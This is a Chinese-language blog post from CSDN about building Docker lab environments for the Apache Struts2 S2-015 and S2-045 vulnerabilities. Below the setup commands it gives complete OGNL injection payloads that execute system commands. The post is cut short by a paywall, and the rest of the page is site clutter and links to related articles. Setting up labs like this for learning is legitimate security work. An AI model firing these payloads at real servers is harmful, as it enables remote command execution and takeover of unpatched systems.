Str2 漏洞 搭建 简单学习

最新推荐文章于 2023-05-12 05:00:00 发布
最新推荐文章于 2023-05-12 05:00:00 发布
阅读量768 收藏
点赞数
分类专栏: Str2命令执行
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38063791/article/details/84140248
版权
本文介绍了Struts2的几个重要漏洞,包括S2-015、S2-045和S2-046。针对每个漏洞,提供了官方链接以及受影响的版本范围。特别提到,S2-015可以通过执行Message触发,修复措施是尽快将Struts2更新到最新版本以避免风险。对于Str-048,文章表明分析尚未完成。
摘要由CSDN通过智能技术生成

struts2_s2-015

官方:https://cwiki.apache.org/confluence/display/WW/S2-015

1感谢大佬的项目:https://github.com/Medicean/VulApps/tree/master/s/struts2/

1拉取景象
docker pull medicean/vulapps:s_struts2_s2-015

1运行
docker run -dt(后台运行) --name sqli-labs (名字) -p 80:80 (本地,docker端口 映射) --rm (docker 停止后 ,删除产生所有的镜像) 
docker run -dt --name struts_s2-015 -p 80:8080 --rm  medicean/vulapps:s_struts2_s2-015

在这里插入图片描述

POC:
/${%23context['xwork.MethodAccessor.denyMethodExecution']=false,%23f=%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),%23f.setAccessible(true),%23f.set(%23_memberAccess,true),@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())}.action
改变 exec中即可

在这里插入图片描述
Message 执行了

struts2-045

1拉取景象
docker pull medicean/vulapps:s_struts2_s2-045

1运行
docker run -dt(后台运行) --name sqli-labs (名字) -p 80:80 (本地,docker端口 映射) --rm (docker 停止后 ,删除产生所有的镜像) 
docker run -dt --name struts_s2-045 -p 80:8080 --rm  medicean/vulapps:s_struts2_s2-045

在这里插入图片描述

POC1:
Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

在这里插入图片描述


                

                
                
        

        

    

  


        

            

                    
                      最低0.47元/天 解锁文章
                        
                    
            

        

    

      

        

            

              
                
                  a_shen_ge
                
              
            

            

                关注
              
            

        

        

          
      

      

            

                专栏目录
          









                



	

		

			

				
					
【Python】STR2漏洞综合扫描+源码分析

				
			

			

				

					浪子燕青的博客
				

				

					01-18
					
					2718
					
				

			

		

		

			
				
花了半天写完的~~ 还不错~~


现在同目录下创建url.txt  将收集到的url放进去  就ok~~


最后成功的会在同目录下生产success.txt~~


附上源码~~~


# -*-coding:utf-8-*-
import requests
import time
print unicode('''


作者:浪子燕青


作者QQ:982722261

			
		

	



                

              
                



	

		

			

				
					
Struts2漏洞 - Struts2-015 Struts2-016 Struts2-045

				
			

			

				

					HAKUNAMATATATTA的博客
				

				

					12-21
					
					2808
					
				

			

		

		

			
				
Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web 应用的开源MVC框架,主要提供两个版本框架产品: Struts 1和Struts2;Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。

			
		

	



                


  
              

                


	

		

			

				
					
漏洞靶场搭建

				
			

			

				

					nejore的博客
				

				

					06-08
					
					978
					
				

			

		

		

			
				
vulhub基础环境搭建

			
		

	





	

		

			

				
					
str2

				
			

			

				

					iteye_20820的博客
				

				

					12-13
					
					180
					
				

			

		

		

			
				
标签:
     1.
      addFieldError("name","this is name");
         带格式
     2. 
     3.  取值栈中的值
         取actionStatct中的值
       参数没有用action参数接收的,可以在#parameters.r1的方式取出
     
 
 获取web元素:
    ...

			
		

	



		

			
		



	

		

			

				
					
漏洞练习环境搭建笔记

				
			

			

				

					qq_32812063的博客
				

				

					11-21
					
					1079
					
				

			

		

		

			
				
漏洞环境

			
		

	





	

		

			

				
					
Vsftpd2.3.4环境搭建-漏洞利用(笑脸漏洞

				
			

			

				

					qq_34914659的博客
				

				

					08-09
					
					3062
					
				

			

		

		

			
				
一、环境搭建

   首先,需要找一个漏洞环境,通过fofa搜索"Vsftpd2.3.4",但是没有找到可以利用的环境,于是搭建环境

   安装包在csdn上下载,需要50积分

  https://download.csdn.net/download/sinat_32937525/11824028

1.靶机环境是centos7 ,首先解压缩包,并上传到靶机目录


tar -zxvf 压缩包名称


2.进入vsftpd目录,赋予文件权限,之后进行make &&a...

			
		

	





	

		

			

				
					
【安全漏洞】Struts2漏洞集合总结

				
			

			

				

					HBohan的博客
				

				

					01-24
					
					3377
					
				

			

		

		

			
				
总结了一部分 Strtus2 漏洞,虽然现在这部分的漏洞很少了,但也是学习的一部分,收集的并不全面,后续会做补充。

漏洞环境搭建可以使用在线的 Vulfocus ,或者使用docker部署。

			
		

	





	

		

			

				
					
matlab/simlulink强化学习环境搭建与智能体训练方法

					
热门推荐

				
			

			

				

					weixin_43942325的博客
				

				

					08-10
					
					1万+
					
				

			

		

		

			
				
matlab/simlulink强化学习环境搭建与智能体训练方法
强化学习分为两个部分,智能体代理和与智能体交互的环境,即便代理可以用现成的模型调调参,但应用场景的数学模型依然是非常难搭建的部分,matlab和simulink的联合仿真无疑给Reinforcement Learning提供了一个非常强大的仿真平台,本篇以DDPG算法为例,详细讲讲matlab/simlulink强化学习环境搭建与智能体训练的具体步骤,及一些参数的设置和调整。
首先得有一个已经搭建好的simulink环境,至于simulink

			
		

	





	

		

			

				
					
XSS漏洞学习笔记

				
			

			

				

					qi_SJQ_的博客
				

				

					12-31
					
					2635
					
				

			

		

		

			
				
xss学习笔记


			
		

	





	

		

			

				
					
"Str2$"变量未定义(学生信息管理系统问题之一)

				
			

			

				

					sunny_LI
				

				

					08-04
					
					1996
					
				

			

		

		

			
				

问题:Str2$变量未定义。
 
我的解决办法:(试了一下不行,定义都有问题)
   
dim str2$ as Boolean
   
str2$ = MsgBox("是否删除当前记录?", vbOKCancel, "删除当前记录")
    

    
If str2$ = vbOK Then
 
 
网上的解决办法:
 
1.
Dim str2$ A

			
		

	





	

		

			

				
					
str1、str2连接,分别用定长存储、堆存储、块链存储实现

				
			

			

				

					程序员,他们想的是什么?他们想的永远都是技术,他们崇尚的也永远都是技术。
				

				

					06-09
					
					1356
					
				

			

		

		

			
				
串连接三种方式实现(定长、堆、块链)1 定长存储2 堆分配存储3 块链存储思路(1):两个子串先分成块,再连接思路(2)先连接,再分块存储
字符串str1、str2连接,分别用定长存储、堆分配存储、块链存储实现,不能直接调用函数库中自带的连接函数。
1 定长存储
#include<iostream>
using namespace std;
#define MAXLEN 255//定义串的最大长度为255,<=255以内的任何串可用
typedef struct {
	char ch[MA

			
		

	





	

		

			

				
					
判断字符串str2是否整体包含在字符串str1中

				
			

			

				

					m0_73497041的博客
				

				

					05-12
					
					1390
					
				

			

		

		

			
				
C语言作业

			
		

	





	

		

			

				
					
字符串函数-C语言基础知识入门

				
			

			

				

					qq_61638928的博客
				

				

					10-03
					
					964
					
				

			

		

		

			
				
几个字符串函数

			
		

	





	

		

			

				
					
从str1中删除str2中包含的字符

				
			

			

				

					jiexuelc blog
				

				

					10-22
					
					3917
					
				

			

		

		

			
				
从str1中删除str2中包含的字符

例如:

char str1[] = “Abc*defghicc”;
char str2[] = “Ac*ic”;
处理结果为:str1[] = “bdefghc”



#include&lt;stdio.h&gt;

void delete_char(char* str1, char* str2)
{
    char *head = str1;  //...

			
		

	





	

		

			

				
					
Struts2最全面的远程命令执行漏洞梳理

				
			

			

				

					LuoOpening的博客
				

				

					03-29
					
					883
					
				

			

		

		

			
				
OGNL的全称是对象图导航语言( Object-Graph Navigation Language),它是一种用于获取和设置 Java对象属性的开源表达式语言,以及其他附加功能,是Struts2的默认表达式语言。使用这种表达式语言,可以利用表达式语法树规则,存储Java对象的任意属性,调用Java对象的方法,同时能够自动实现期望的类型转换。OGNL最初是作为一种使用属性名称在UI组件和控制器之间建立关联的方法。

			
		

	





	

		

			

				
					
str2-045漏洞事件,你想要的这里都有

				
			

			

				

					chengman3837的博客
				

				

					03-09
					
					204
					
				

			

		

		

			
				
话说昨天一觉醒来,发现整个安全圈被一个名为str2-045的漏洞霸屏了,好多小伙伴已经开始了喜刷刷的艰苦奋斗过程。然而对于很多小白童鞋来讲,他们可能还是处于懵逼的状态,别急,咱们专门为你们做了一期专题,来告诉你这到底是咋回事!  
这个漏洞的全名啊,叫做:基于Jakarta插件的插件的Str...

			
		

	





	

		

			

				
					
struts2的漏洞

				
			

			

				

					杨航的专栏
				

				

					03-10
					
					2354
					
				

			

		

		

			
				
文章前半部分来自团队小伙伴阿德马的总结,后半部分的Poc和Exp是小编匆忙之际借鉴而来,感谢写Poc和Exp的伙伴~
安恒给官方上报的,然后官方选择了1个对国内来说比较敏感的时期发了公告出来,好蛋疼。
该漏洞的CVE编号是CVE-2017-5638(s2-045),攻击者利用该漏洞可以进行远程命令执行,从而获取更高的服务器权限。
漏洞描述:
查了点资料,发现跟struts2配置中strut

			
		

	





	

		

			

				
					
怎么比较str1和str2

					
最新发布

				
			

			

				

					06-07
				

			

		

		

			
				
strcmp函数比较两个字符串的方法是逐个比较它们的字符,直到发现不同的字符或者到达字符串结尾。具体的比较方式如下:

1. 首先,比较str1和str2的第一个字符。如果它们相等,就继续比较它们的下一个字符,直到找到不同的字符或者到达字符串结尾。

2. 如果str1和str2的第一个字符不相等,那么strcmp函数就会返回它们的ASCII码值之差,即str1[0] - str2[0]。

3. 如果str1和str2的第一个字符相等,但它们的第二个字符不相等,那么strcmp函数就会返回它们的ASCII码值之差,即str1[1] - str2[1]。

4. 以此类推,直到找到不同的字符或者到达字符串结尾。

5. 如果str1和str2的所有字符都相等,那么strcmp函数就会返回0,表示两个字符串相等。

需要注意的是,strcmp函数比较的是字符串中的字符,而不是字符串的长度。如果两个字符串的长度不同,那么在比较到较短字符串的结尾时,会返回一个小于0或大于0的值。

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值